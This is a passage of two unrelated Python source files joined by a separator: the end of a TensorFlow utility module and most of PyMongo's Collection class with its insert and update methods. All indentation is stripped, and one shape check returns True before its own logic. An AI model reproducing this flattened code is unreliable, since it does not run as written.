from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
sess = sess or get_session()
os.makedirs(os.path.dirname(fname), exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
os.makedirs(os.path.dirname(save_path), exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
return True
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
from tensorboard import main as tb
import threading
tf.flags.FLAGS.logdir = log_dir
t = threading.Thread(target=tb.main, args=([]))
t.start()
|
collection.py
|
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
abc,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.aggregation import (_CollectionAggregationCommand,
_CollectionRawAggregationCommand)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor, RawBatchCommandCursor
from pymongo.common import ORDERED_TYPES
from pymongo.collation import validate_collation_or_none
from pymongo.change_stream import CollectionChangeStream
from pymongo.cursor import Cursor, RawBatchCursor
from pymongo.errors import (BulkWriteError,
ConfigurationError,
InvalidName,
InvalidOperation,
OperationFailure)
from pymongo.helpers import (_check_write_command_response,
_raise_last_error)
from pymongo.message import _UNICODE_REPLACE_CODEC_OPTIONS
from pymongo.operations import IndexModel
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
_UJOIN = u"%s.%s"
_FIND_AND_MODIFY_DOC_FIELDS = {'value': 1}
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
session=None, **kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True``, `collation` is specified, or any additional
keyword arguments are present, a ``create`` command will be
sent, using ``session`` if specified. Otherwise, a ``create`` command
will not be sent and the collection will be created implicitly on first
use. The optional ``session`` argument is *only* used for the ``create``
command, it is not associated with the collection afterward.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. If a collation is provided,
it will be passed to the create collection command. This option is
only supported on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` that is used with
the create collection command
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs or collation:
self.__create(kwargs, collation, session)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self, session):
return self.__database.client._socket_for_reads(
self._read_preference_for(session), session)
def _socket_for_writes(self, session):
return self.__database.client._socket_for_writes(session)
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=None,
write_concern=None,
collation=None,
session=None,
retryable_write=False,
user_fields=None):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
- `write_concern`: An instance of
:class:`~pymongo.write_concern.WriteConcern`. This option is only
valid for MongoDB 3.4 and above.
- `collation` (optional) - An instance of
:class:`~pymongo.collation.Collation`.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `retryable_write` (optional): True if this command is a retryable
write.
- `user_fields` (optional): Response fields that should be decoded
using the TypeDecoders from codec_options, passed to
bson._decode_all_selective.
:Returns:
The result document.
"""
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
self.__database.name,
command,
slave_ok,
read_preference or self._read_preference_for(session),
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern,
write_concern=write_concern,
parse_write_concern_error=True,
collation=collation,
session=s,
client=self.__database.client,
retryable_write=retryable_write,
user_fields=user_fields)
def __create(self, options, collation, session):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes(session) as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
write_concern=self._write_concern_for(session),
collation=collation, session=session)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database,
_UJOIN % (self.__name, name),
False,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_unordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_ordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False, session=None):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_list("requests", requests)
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
try:
request._add_to_bulk(blk)
except AttributeError:
raise TypeError("%r is not a valid request" % (request,))
write_concern = self._write_concern_for(session)
bulk_api_result = blk.execute(write_concern, session)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, op_id,
bypass_doc_val, func, *args):
"""Internal legacy unacknowledged write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if bypass_doc_val and sock_info.max_wire_version >= 4:
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
args = args + (sock_info.compression_context,)
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(rqst_id, msg, max_size, False)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val,
session):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
def _insert_command(session, sock_info, retryable_write):
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_INSERT.
return self._legacy_write(
sock_info, 'insert', command, op_id,
bypass_doc_val, message.insert, self.__full_name,
[doc], check_keys, False, write_concern.document, False,
self.__write_response_codec_options)
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
check_keys=check_keys,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
self.__database.client._retryable_write(
acknowledged, _insert_command, session)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False, session=None):
"""Internal insert helper."""
if isinstance(docs, abc.Mapping):
return self._insert_one(
docs, ordered, check_keys, manipulate, write_concern, op_id,
bypass_doc_val, session)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
write_concern = write_concern or self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_doc_val)
blk.ops = [(message._INSERT, doc) for doc in gen()]
try:
blk.execute(write_concern, session=session)
except BulkWriteError as bwe:
_raise_last_error(bwe.details)
return ids
def insert_one(self, document, bypass_document_validation=False,
session=None):
"""Insert a single document.
>>> db.test.count_documents({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
write_concern = self._write_concern_for(session)
return InsertOneResult(
self._insert(document,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
session=session),
write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False, session=None):
"""Insert an iterable of documents.
>>> db.test.count_documents({})
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count_documents({})
2
:Parameters:
- `documents`: A iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, abc.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
write_concern = self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(write_concern, session=session)
return InsertManyResult(inserted_ids, write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None, retryable_write=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
collation = validate_collation_or_none(collation)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
update_doc = SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
update_doc['collation'] = collation
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use array_filters.')
elif not acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged writes.')
else:
update_doc['arrayFilters'] = array_filters
command = SON([('update', self.name),
('ordered', ordered),
('updates', [update_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, False, write_concern.document,
check_keys, self.__write_response_codec_options)
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write).copy()
_check_write_command_response(result)
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
if not acknowledged:
return None
return result
def _update_retryable(
self, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None):
"""Internal update / replace helper."""
def _update(session, sock_info, retryable_write):
return self._update(
sock_info, criteria, document, upsert=upsert,
check_keys=check_keys, multi=multi, manipulate=manipulate,
write_concern=write_concern, op_id=op_id, ordered=ordered,
bypass_doc_val=bypass_doc_val, collation=collation,
array_filters=array_filters, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_update, session)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False, collation=None,
session=None):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, replacement, upsert,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, session=session),
write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False,
collation=None, array_filters=None, session=None):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added the `array_filters` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def update_many(self, filter, update, upsert=False, array_filters=None,
bypass_document_validation=False, collation=None,
session=None):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation` (optional): If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added ``array_filters`` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False, multi=True,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def drop(self, session=None):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
The following two calls are equivalent:
